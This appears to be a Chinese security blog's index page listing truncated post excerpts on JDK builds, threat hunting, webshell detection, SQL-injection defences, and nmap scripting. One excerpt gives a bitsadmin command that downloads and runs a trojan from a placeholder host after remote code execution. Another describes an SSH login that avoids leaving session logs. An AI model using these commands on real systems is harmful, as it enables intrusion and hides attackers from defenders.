加载中
编译jdk8

本文环境 ubuntu 16.04 全新安装虚拟机 apt -y install mercurial # 安装版本控制 add-apt-repository ppa:openjdk-r/ppa apt-get update apt-get -y install openjdk-7-jre apt-get -y inst...

威胁狩猎简介<译文>

什么是威胁狩猎 威胁狩猎也被叫做威胁搜索、网络狩猎或者网络威胁搜索,他不同于apt攻击或者红蓝军渗透测试这类模拟攻击者攻寻找黑入IT设施漏洞的行为。 在威胁狩猎中,安全专家们会打破常规...

09/06 15:57
19
一个牛逼的思路

设立公司黑名单ip库 设立很多伪装性很强的二级域名 有人访问这些二级域名就把ip拉入黑名单库

09/03 16:15
15
远程rce漏洞执行命令

# windows # 首先需要准备一个木马程序ma.exe bitsadmin /transfer myjob1/download /priority normal http://www.xxx.com/ma.exe c:\windows\temp\ma.exe c:\windows\temp\ma.exe # ma.exe保...

09/02 09:07
12
利用lamda函数 的函数式编程 实现scrapy传入参数 实现爬行网站title

import scrapy from scrapy.spiders import Spider def parse_response(response, ip_in): title = response.xpath("/html/head/title").extract()[0] filename = 'quotes.txt' with open......

08/28 16:15
6
阻止java执行命令的实现方案

最近st2 框架又出漏洞了 一大堆java被执行命令了 这里我提一个解决方案 可以适当缓解服务端被漏洞进行rce漏洞的问题 LD_PRELOAD替换进程底层函数 首先请看这篇文章 如果是某位c++的大佬 您老...

不会留下即时日志的ssh登录方法

ssh -T root@127.0.0.1 /bin/bash -i #-T 表示不分配伪终端 (正常的会话,在分配伪终端之后才会调用utmp和wtmp的日志接口) # /usr/bin/bash -i 表示在登录之后 调用bash命令 #不留下.bash...

08/15 14:38
14
改造mybatis抵御sql注入的研究和SDL的思考

这段时间看了百度的openrasp的源代码和相关资料 (地址:https://rasp.baidu.com) 在实施的过程中还是遇到了很多的阻力,所以开始自己调研相关的技术方案 我觉得能在研发阶段就能使程序员适应安...

调试spring boot的方法

首先在springboot的pom.xml中的插件中增加一个用于调试的插件 <build> <plugins> <plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-m......

编译mybatis 3.4.6 替换到springboot 2.0.2

编译mybatis需要先编译一个mybatis的parent项目(对应的spring boot 2.0.2的mybatis-spring-boot-starter的mybatis版本) 本文举例为mybatis 3.4.6(本文当前的springboot 依赖3.4.6 可以在ide...

php查inode时间戳查webshell

<?php function read_all($dir) { if (!is_dir($dir)) return false; $handle = opendir($dir); if ($handle) { while (($fl = readdir($handle)) !== false) { $temp = $......

07/07 15:53
28
利用openssl生成强密码命令

echo `openssl rand -base64 50 | tr -dc A-Z-a-z-0-9 | head -c${1:-32}` # 只会出现大小写和数字 长度控制在32位 # 第一个50代表足够的原始长度 第二个32代表长度为32......

06/22 11:16
17
nmap为了开发方便 可以做简单的修改

因为nmap扫描是默认使用的是nse脚本,但是在开发的过程中需要修改后缀(主要是因为后缀为lua才能显示高亮,所以这里用一个取巧的办法) nse_main.lua文件中我们找到如下代码 local t, path = cn...

06/19 13:52
7
python3写unicode编码到文件

import sys #读取源文件内容支持中文 用的utf-8 f=open('be.txt','r',encoding='utf-8') data=f.read() f.close() # 打印宽字节编码 print(data.encode('unicode_escape')) # 写入...

06/13 17:42
34
centos6/7通用查看系统版本

cat /etc/redhat-release # 或者 cat /etc/centos-release 不管是 6 还是 7 都能看到 发行的版本信息

06/11 10:37
12
ruby centos 快速安装

Ruby 安装方法——RVM 操作系统: CentOS 7.4 说明:在CentOS上,直接用 yum 安装 Ruby的话,安装的版本比较低,所以,就直接用 RVM 进行安装。 步骤1: 安装依赖包 yum install gcc-c++ patc...

06/08 14:57
10
linux下获取本机的获取内网和外网地址

1.获取内网地址(私有地址) ifconfig -a 2.获取外网地址(公网地址) curl members.3322.org/dyndns/getip

06/05 22:12
14
一个很棒的lua函数 用来打印table的内容

function print_r ( t ) local print_r_cache={} local function sub_print_r(t,indent) if (print_r_cache[tostring(t)]) then print(indent.."*"..tostring...

05/31 19:54
39
nmap实现 自动发现web漏洞的思路

local http = require "http" local shortport = require "shortport" local stdnse = require "stdnse" local string = require "string" -- 作者 author = "k4n5ha0" -- 授权 lic...

05/31 15:35
215
nmap在linux下编译

linux下编译nmap会遇到一个缺失依赖的问题 ubuntu下可以 apt-get build-dep nmap # 或者 apt install libssl-dev yum install openssl-devel 安装完成后再编译 就可以自己解决依赖问题...

05/30 10:05
6

没有更多内容

加载失败,请刷新页面

返回顶部
顶部